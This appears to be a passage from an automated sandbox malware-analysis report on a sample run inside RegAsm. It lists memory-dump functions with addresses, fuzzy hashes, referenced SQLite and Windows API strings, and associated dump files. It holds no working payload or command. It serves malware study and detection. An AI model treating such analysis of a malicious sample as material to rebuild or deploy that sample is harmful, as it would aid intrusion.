                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: *$?
                                                                                                                                                                                                • API String ID: 0-2367018687
                                                                                                                                                                                                • Opcode ID: 217e6c6a8ce3cf581d3df2e73733243f4d6cd2dc3efc3b6358d30090155183d5
                                                                                                                                                                                                • Instruction ID: 26ced7a6d5711804d1fb188a0c58e039648b0b74276a8f84b66c53b220db15b2
                                                                                                                                                                                                • Opcode Fuzzy Hash: 217e6c6a8ce3cf581d3df2e73733243f4d6cd2dc3efc3b6358d30090155183d5
                                                                                                                                                                                                • Instruction Fuzzy Hash: 48710670A083518FE7158F28C98079BBBE7FFC5210F48496DE8C587305D775EA458B92
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4AC8E0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 206COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • LIKE or GLOB pattern too complex, xrefs: 1B4AC94F
                                                                                                                                                                                                • ESCAPE expression must be a single character, xrefs: 1B4ACA43
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: ESCAPE expression must be a single character$LIKE or GLOB pattern too complex
                                                                                                                                                                                                • API String ID: 0-264706735
                                                                                                                                                                                                • Opcode ID: 0ca3b50f36aa830983f0d445e2947e43f9578784bc5d2d9aaba423c6b9362aaf
                                                                                                                                                                                                • Instruction ID: 5a678a69543715204cd79cced4e7c5c5d555fd17e5cd73af4c47512995e0f7dd
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0ca3b50f36aa830983f0d445e2947e43f9578784bc5d2d9aaba423c6b9362aaf
                                                                                                                                                                                                • Instruction Fuzzy Hash: 86618875A082918FDB44CA34CC81BF677A5AB61324F24C28DE8A39F3D3D679C482C794
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4AD0F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: string or blob too big
                                                                                                                                                                                                • API String ID: 0-2803948771
                                                                                                                                                                                                • Opcode ID: 7e542520b1fe1f710210b44b01f44cd06941c15569d95131cd032e17837624e3
                                                                                                                                                                                                • Instruction ID: 6a8bb90d29d873de9851126be5a4b1471933c9e8b375d99dbe1c69b126a71f3d
                                                                                                                                                                                                • Opcode Fuzzy Hash: 7e542520b1fe1f710210b44b01f44cd06941c15569d95131cd032e17837624e3
                                                                                                                                                                                                • Instruction Fuzzy Hash: 44412D778042414FEB104A34AC417EA7F96DF75220F14892CE8D6573D2E62AE549D753
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4A55D0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • delayed %dms for lock/sharing conflict at line %d, xrefs: 1B4A56D1
                                                                                                                                                                                                • winDelete, xrefs: 1B4A569C
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: delayed %dms for lock/sharing conflict at line %d$winDelete
                                                                                                                                                                                                • API String ID: 0-1405699761
                                                                                                                                                                                                • Opcode ID: 97f5736ec94168799b2ab4cc8b0d5d71ac6f1417cd66a8c8c4c8e6de5d9ea3df
                                                                                                                                                                                                • Instruction ID: a4fc97034fe52bdf3e9e7bb5a5dce2eaa3157e6ee49cdf8e648a3519a9a6fa64
                                                                                                                                                                                                • Opcode Fuzzy Hash: 97f5736ec94168799b2ab4cc8b0d5d71ac6f1417cd66a8c8c4c8e6de5d9ea3df
                                                                                                                                                                                                • Instruction Fuzzy Hash: A8312B72E112218BE7142A7CDEC99DA771CA7B4672F01453AEDCBC6381D720C44CC6E1
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4AD300 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 103COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: string or blob too big
                                                                                                                                                                                                • API String ID: 0-2803948771
                                                                                                                                                                                                • Opcode ID: be05554320034c9a8a393f90d2e4362f416993cc85044aab924b7d802c2cbfb8
                                                                                                                                                                                                • Instruction ID: 2cd1207f9a2c06cd159e9b6130c26f485c5b0ac34a327707fd984e9eaa7b60f0
                                                                                                                                                                                                • Opcode Fuzzy Hash: be05554320034c9a8a393f90d2e4362f416993cc85044aab924b7d802c2cbfb8
                                                                                                                                                                                                • Instruction Fuzzy Hash: 803192B2D042655BDF105A346C01BE677259BA5324F1882D8FCD76F3C6D227E817D3A0
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B58DEE0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • sqlite_stat1, xrefs: 1B58DF30
                                                                                                                                                                                                • SELECT tbl,idx,stat FROM %Q.sqlite_stat1, xrefs: 1B58DF4F
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: SELECT tbl,idx,stat FROM %Q.sqlite_stat1$sqlite_stat1
                                                                                                                                                                                                • API String ID: 0-3572622772
                                                                                                                                                                                                • Opcode ID: 05c37bde3513ae663a1df748f5f7d74bb41ac7f911f7d22bfcd7e944909fbb3c
                                                                                                                                                                                                • Instruction ID: 7b1f7cf8172fd61e429e992cfa6cd43d73af04124487e502bec29d450ccf1011
                                                                                                                                                                                                • Opcode Fuzzy Hash: 05c37bde3513ae663a1df748f5f7d74bb41ac7f911f7d22bfcd7e944909fbb3c
                                                                                                                                                                                                • Instruction Fuzzy Hash: EB21D675A013855FEB10DF26DC81EABB7E8AF81A24B05456CFC849B291E321FC45D7A1
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B627E00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: OsError 0x%lx (%lu)
                                                                                                                                                                                                • API String ID: 0-3720535092
                                                                                                                                                                                                • Opcode ID: b735940643f83b5a544cbd74b49ab1270c556910509c734c3ae1910aa8759579
                                                                                                                                                                                                • Instruction ID: 95374fa29d07a50275de656d1b33f8c5b78082963f56b0b290848f5f237d8e4d
                                                                                                                                                                                                • Opcode Fuzzy Hash: b735940643f83b5a544cbd74b49ab1270c556910509c734c3ae1910aa8759579
                                                                                                                                                                                                • Instruction Fuzzy Hash: F22192B1500221ABEB045B64DC89FAB37A8FFA4265F00456CFDC9D1150DB34DD18DBA2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4BF740 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • DROP TABLE '%q'.'%q_node';DROP TABLE '%q'.'%q_rowid';DROP TABLE '%q'.'%q_parent';, xrefs: 1B4BF752
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: DROP TABLE '%q'.'%q_node';DROP TABLE '%q'.'%q_rowid';DROP TABLE '%q'.'%q_parent';
                                                                                                                                                                                                • API String ID: 0-2071071404
                                                                                                                                                                                                • Opcode ID: 8ba2f788058339da5149233e4f09278598022d733707fc26f3c6e112801f0840
                                                                                                                                                                                                • Instruction ID: 6007f285dd8650e4bb967c0cf2ebe8e356e1a40e83d35a5d54d246329abca6d9
                                                                                                                                                                                                • Opcode Fuzzy Hash: 8ba2f788058339da5149233e4f09278598022d733707fc26f3c6e112801f0840
                                                                                                                                                                                                • Instruction Fuzzy Hash: 5D11A3B5600111AFE704AB69EDC9FEB73ACEBE4215F00456DFE89D2240E761E849C6B1
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B49141F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • GetXStateFeaturesMask, xrefs: 1B670E34
                                                                                                                                                                                                • InitializeCriticalSectionEx, xrefs: 1B670E84
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: GetXStateFeaturesMask$InitializeCriticalSectionEx
                                                                                                                                                                                                • API String ID: 0-4196971266
                                                                                                                                                                                                • Opcode ID: 7f907ade5b71451b0b440bdb2c5d646a5dff998821ed12783629dd02e4e6aa0a
                                                                                                                                                                                                • Instruction ID: 8b59dcaee6d2c4d38c52062adf5d3a524514bb21ab27c3cd0bbb87c6dddb61cd
                                                                                                                                                                                                • Opcode Fuzzy Hash: 7f907ade5b71451b0b440bdb2c5d646a5dff998821ed12783629dd02e4e6aa0a
                                                                                                                                                                                                • Instruction Fuzzy Hash: 5B018FBA640228B7CB153B91CD05EDE7F26EBB87A2F054121FE5829250DA72986097E0
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 0040D02F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Xinvalid_argumentmemcpystd::_
                                                                                                                                                                                                • String ID: string too long
                                                                                                                                                                                                • API String ID: 1835169507-2556327735
                                                                                                                                                                                                • Opcode ID: 86d41fe763d4f9670a0bda7700db276dcec98eba4a10b3b688012156d81808ca
                                                                                                                                                                                                • Instruction ID: 5178b8b9bae27dddffe99f82d3cba96b452232b4c10b18376653ba913e323939
                                                                                                                                                                                                • Opcode Fuzzy Hash: 86d41fe763d4f9670a0bda7700db276dcec98eba4a10b3b688012156d81808ca
                                                                                                                                                                                                • Instruction Fuzzy Hash: AF11B9317042109BDB309EADC84095AB7A9EF41758F10093FF556AB2C2C77A994A87DE
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 0040D0C8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 0040D0E2
                                                                                                                                                                                                  • Part of subcall function 0041D590: std::exception::exception.LIBCMT ref: 0041D5A5
                                                                                                                                                                                                  • Part of subcall function 0041D590: __CxxThrowException@8.LIBCMT ref: 0041D5BA
                                                                                                                                                                                                  • Part of subcall function 0041D590: std::exception::exception.LIBCMT ref: 0041D5CB
                                                                                                                                                                                                  • Part of subcall function 0040CED1: std::_Xinvalid_argument.LIBCPMT ref: 0040CEE2
                                                                                                                                                                                                • memcpy.MSVCRT ref: 0040D13D
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • invalid string position, xrefs: 0040D0DD
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throwmemcpy
                                                                                                                                                                                                • String ID: invalid string position
                                                                                                                                                                                                • API String ID: 214693668-1799206989
                                                                                                                                                                                                • Opcode ID: 6db7f21e639e4ee25f80c59323fcb4094b3614726ddfd8fc1b0f95dadf20a757
                                                                                                                                                                                                • Instruction ID: c288a1353cca4a63b317874bbee34a0bb446cbe3dd24b07f24b290e3641dc7f7
                                                                                                                                                                                                • Opcode Fuzzy Hash: 6db7f21e639e4ee25f80c59323fcb4094b3614726ddfd8fc1b0f95dadf20a757
                                                                                                                                                                                                • Instruction Fuzzy Hash: F2110831B04210E7CF249E4D9C80A6AB3A5AF85714F20053FF856AB3C1CB79D849C79D
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B6799D8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,1B679AE5,1B6CD448,0000000C), ref: 1B679A24
                                                                                                                                                                                                • GetFileType.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,1B679AE5,1B6CD448,0000000C), ref: 1B679A36
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
